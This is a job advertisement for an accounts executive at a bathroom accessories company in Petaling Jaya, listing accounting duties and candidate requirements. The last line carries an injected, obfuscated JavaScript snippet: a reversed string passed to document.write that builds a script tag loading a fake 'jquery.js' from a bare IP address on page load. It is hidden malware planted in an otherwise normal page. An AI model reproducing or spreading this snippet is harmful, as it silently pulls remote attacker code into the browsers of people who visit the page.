Location : PJU 6A, Petaling Jaya
Industry : Bathroom accessories
– Handle full set of accounts, manage general ledger and monthly written reconciliation of balance sheet accounts.
– To ensure accounts payable, petty cash fund, bank reconciliation, journals and general ledger function are performed in an effective and efficient manner.
– Prepare accurate financial report and handle some administration works.
– Liaise with external parties i.e. bankers, auditors and regulatory authorities.
– Assist in ad-hoc assignment.
– Assist in the coordination of year end financial audit.
– Candidate must posses at least a Bachelor’s Degree in Accounting or its equivalent. Fresh graduates are welcome to apply.
– Minimum 1 or 2 years’ experience.
– Knowledge in accounting system is an added advantage
– Proficiency in MS Office applications and Microsoft Navision system is added advantage.
– Good interpersonal and communication skills.
– Able to work independently.
– Proficient in English & BM. Chinese is an added advantage.
– Self-starter and highly committed to accomplish tasks. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))